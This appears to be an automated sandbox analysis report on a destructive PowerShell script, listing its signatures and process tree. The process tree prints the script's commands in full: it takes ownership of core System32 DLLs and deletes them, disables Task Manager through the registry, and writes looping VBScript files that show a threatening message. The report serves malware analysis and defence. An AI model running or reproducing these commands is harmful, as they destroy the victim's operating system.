c6a55bb360c44bc4bc2ad2c0658c2bfd941e0bb987688dd9178c47059aa8b472

Analysis

max time kernel
139s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
15/07/2024, 16:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

run.ps1
Size

2KB
MD5

c9cf4a8860f21ea2c8fd79b8e527a06b
SHA1

385bd7877eba66e3ed43350227707b2b97c0effc
SHA256

c6a55bb360c44bc4bc2ad2c0658c2bfd941e0bb987688dd9178c47059aa8b472
SHA512

561f2494d87d56b9a3883f3afeb93c3e228367c6629deef2fa884dedf62cf0e7b15e8e2d2f1537fdcd3e84200244172e2c5fb36d779b278f256cf66019dd6fd3

Score

8^/10

discovery evasion execution exploit

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Possible privilege escalation attempt 22 IoCs

exploit

pid	Process
3744	takeown.exe
3348	icacls.exe
3644	icacls.exe
3584	takeown.exe
4332	takeown.exe
3528	icacls.exe
3296	icacls.exe
2104	icacls.exe
2684	takeown.exe
4408	takeown.exe
5048	icacls.exe
3228	icacls.exe
740	takeown.exe
1260	icacls.exe
4484	takeown.exe
2272	icacls.exe
2812	takeown.exe
216	takeown.exe
5040	takeown.exe
2744	icacls.exe
3596	takeown.exe
4076	icacls.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	WScript.exe

Modifies file permissions 1 TTPs 22 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2272	icacls.exe
2812	takeown.exe
3228	icacls.exe
2684	takeown.exe
5040	takeown.exe
3596	takeown.exe
1260	icacls.exe
3584	takeown.exe
5048	icacls.exe
2744	icacls.exe
4484	takeown.exe
3744	takeown.exe
740	takeown.exe
2104	icacls.exe
3644	icacls.exe
4076	icacls.exe
4408	takeown.exe
4332	takeown.exe
3528	icacls.exe
216	takeown.exe
3296	icacls.exe
3348	icacls.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\die.vbs	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
384	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133655328579578549"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	WScript.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1368	reg.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
384	powershell.exe
384	powershell.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
8220	chrome.exe
8220	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs

pid	Process
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	384	powershell.exe
Token: SeTakeOwnershipPrivilege	3744	takeown.exe
Token: SeTakeOwnershipPrivilege	2812	takeown.exe
Token: SeTakeOwnershipPrivilege	2684	takeown.exe
Token: SeTakeOwnershipPrivilege	216	takeown.exe
Token: SeTakeOwnershipPrivilege	740	takeown.exe
Token: SeTakeOwnershipPrivilege	4408	takeown.exe
Token: SeTakeOwnershipPrivilege	3584	takeown.exe
Token: SeTakeOwnershipPrivilege	4332	takeown.exe
Token: SeTakeOwnershipPrivilege	5040	takeown.exe
Token: SeTakeOwnershipPrivilege	3596	takeown.exe
Token: SeTakeOwnershipPrivilege	4484	takeown.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe
Token: SeShutdownPrivilege	2860	chrome.exe
Token: SeCreatePagefilePrivilege	2860	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe
2860	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 384 wrote to memory of 3332	384	powershell.exe	84
PID 384 wrote to memory of 3332	384	powershell.exe	84
PID 3332 wrote to memory of 3744	3332	cmd.exe	85
PID 3332 wrote to memory of 3744	3332	cmd.exe	85
PID 3332 wrote to memory of 2272	3332	cmd.exe	86
PID 3332 wrote to memory of 2272	3332	cmd.exe	86
PID 384 wrote to memory of 4000	384	powershell.exe	87
PID 384 wrote to memory of 4000	384	powershell.exe	87
PID 4000 wrote to memory of 2812	4000	cmd.exe	88
PID 4000 wrote to memory of 2812	4000	cmd.exe	88
PID 4000 wrote to memory of 3528	4000	cmd.exe	89
PID 4000 wrote to memory of 3528	4000	cmd.exe	89
PID 384 wrote to memory of 4724	384	powershell.exe	90
PID 384 wrote to memory of 4724	384	powershell.exe	90
PID 4724 wrote to memory of 2684	4724	cmd.exe	91
PID 4724 wrote to memory of 2684	4724	cmd.exe	91
PID 4724 wrote to memory of 2104	4724	cmd.exe	92
PID 4724 wrote to memory of 2104	4724	cmd.exe	92
PID 384 wrote to memory of 2116	384	powershell.exe	93
PID 384 wrote to memory of 2116	384	powershell.exe	93
PID 2116 wrote to memory of 216	2116	cmd.exe	94
PID 2116 wrote to memory of 216	2116	cmd.exe	94
PID 2116 wrote to memory of 3296	2116	cmd.exe	95
PID 2116 wrote to memory of 3296	2116	cmd.exe	95
PID 384 wrote to memory of 4208	384	powershell.exe	96
PID 384 wrote to memory of 4208	384	powershell.exe	96
PID 4208 wrote to memory of 740	4208	cmd.exe	97
PID 4208 wrote to memory of 740	4208	cmd.exe	97
PID 4208 wrote to memory of 3348	4208	cmd.exe	100
PID 4208 wrote to memory of 3348	4208	cmd.exe	100
PID 384 wrote to memory of 2656	384	powershell.exe	101
PID 384 wrote to memory of 2656	384	powershell.exe	101
PID 2656 wrote to memory of 4408	2656	cmd.exe	103
PID 2656 wrote to memory of 4408	2656	cmd.exe	103
PID 2656 wrote to memory of 3644	2656	cmd.exe	104
PID 2656 wrote to memory of 3644	2656	cmd.exe	104
PID 384 wrote to memory of 1612	384	powershell.exe	105
PID 384 wrote to memory of 1612	384	powershell.exe	105
PID 1612 wrote to memory of 3584	1612	cmd.exe	106
PID 1612 wrote to memory of 3584	1612	cmd.exe	106
PID 1612 wrote to memory of 5048	1612	cmd.exe	107
PID 1612 wrote to memory of 5048	1612	cmd.exe	107
PID 384 wrote to memory of 4324	384	powershell.exe	108
PID 384 wrote to memory of 4324	384	powershell.exe	108
PID 4324 wrote to memory of 4332	4324	cmd.exe	109
PID 4324 wrote to memory of 4332	4324	cmd.exe	109
PID 4324 wrote to memory of 3228	4324	cmd.exe	110
PID 4324 wrote to memory of 3228	4324	cmd.exe	110
PID 384 wrote to memory of 3360	384	powershell.exe	111
PID 384 wrote to memory of 3360	384	powershell.exe	111
PID 3360 wrote to memory of 5040	3360	cmd.exe	112
PID 3360 wrote to memory of 5040	3360	cmd.exe	112
PID 3360 wrote to memory of 2744	3360	cmd.exe	113
PID 3360 wrote to memory of 2744	3360	cmd.exe	113
PID 384 wrote to memory of 372	384	powershell.exe	114
PID 384 wrote to memory of 372	384	powershell.exe	114
PID 372 wrote to memory of 3596	372	cmd.exe	115
PID 372 wrote to memory of 3596	372	cmd.exe	115
PID 372 wrote to memory of 1260	372	cmd.exe	116
PID 372 wrote to memory of 1260	372	cmd.exe	116
PID 384 wrote to memory of 2992	384	powershell.exe	117
PID 384 wrote to memory of 2992	384	powershell.exe	117
PID 2992 wrote to memory of 4484	2992	cmd.exe	118
PID 2992 wrote to memory of 4484	2992	cmd.exe	118

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:384
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\hal.dll && icacls C:\Windows\System32\hal.dll /grant Everyone:(F) && del/f C:\Windows\System32\hal.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3332
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\hal.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3744
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\hal.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2272
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\user32.dll && icacls C:\Windows\System32\user32.dll /grant Everyone:(F) && del/f C:\Windows\System32\user32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4000
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\user32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\user32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3528
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\kernel32.dll && icacls C:\Windows\System32\kernel32.dll /grant Everyone:(F) && del/f C:\Windows\System32\kernel32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4724
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\kernel32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\kernel32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2104
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\gdi32.dll && icacls C:\Windows\System32\gdi32.dll /grant Everyone:(F) && del/f C:\Windows\System32\gdi32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\gdi32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:216
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\gdi32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3296
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\advapi32.dll && icacls C:\Windows\System32\advapi32.dll /grant Everyone:(F) && del/f C:\Windows\System32\advapi32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4208
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\advapi32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:740
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\advapi32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3348
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\ntdll.dll && icacls C:\Windows\System32\ntdll.dll /grant Everyone:(F) && del/f C:\Windows\System32\ntdll.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2656
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\ntdll.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4408
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\ntdll.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3644
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\shell32.dll && icacls C:\Windows\System32\shell32.dll /grant Everyone:(F) && del/f C:\Windows\System32\shell32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1612
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\shell32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3584
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\shell32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5048
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\ole32.dll && icacls C:\Windows\System32\ole32.dll /grant Everyone:(F) && del/f C:\Windows\System32\ole32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4324
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\ole32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4332
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\ole32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3228
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\comdlg32.dll && icacls C:\Windows\System32\comdlg32.dll /grant Everyone:(F) && del/f C:\Windows\System32\comdlg32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3360
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\comdlg32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5040
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\comdlg32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2744
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\wininet.dll && icacls C:\Windows\System32\wininet.dll /grant Everyone:(F) && del/f C:\Windows\System32\wininet.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:372
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\wininet.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3596
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\wininet.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1260
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\msvcrt.dll && icacls C:\Windows\System32\msvcrt.dll /grant Everyone:(F) && del/f C:\Windows\System32\msvcrt.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2992
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\msvcrt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4484
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\msvcrt.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4076
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"
  2⤵
  PID:464
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1368
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo msgbox "YOU ARE GOING TO DIE" >> %windir%\die.vbs"
  2⤵
  - Drops file in Windows directory
  PID:1868
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo set wshshell = createobject("wscript.shell") >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:5008
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo s = 1000 >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:3316
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo for i = 1 to 20 >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:2956
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo s = s - 10 >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:2224
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo wshshell.run "chrome.exe https://www.google.com/search?q=im+dead" >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:3524
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo wshshell.run "%windir%\die.vbs" >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:1232
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo wscript.sleep s >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:752
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo next >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:1140
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "start %windir%\loop.vbs"
  2⤵
  - Checks computer location settings
  - Modifies registry class
  PID:2484
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\loop.vbs"
    3⤵
    - Checks computer location settings
    - Modifies registry class
    PID:4644
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2860
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:3336
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:2
        5⤵
        
        PID:436
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:8
        5⤵
        
        PID:4044
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2224 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:8
        5⤵
        
        PID:1020
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3016 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:4428
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3024 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:2704
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3552 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:4760
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4420 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:2568
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4084 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:1768
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3100 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:4188
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3332 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:3212
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4832 --field-trial-handle=1904,i,5295004553142565862,5701929792091272272,131072 /prefetch:1
        5⤵
        
        PID:2300
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
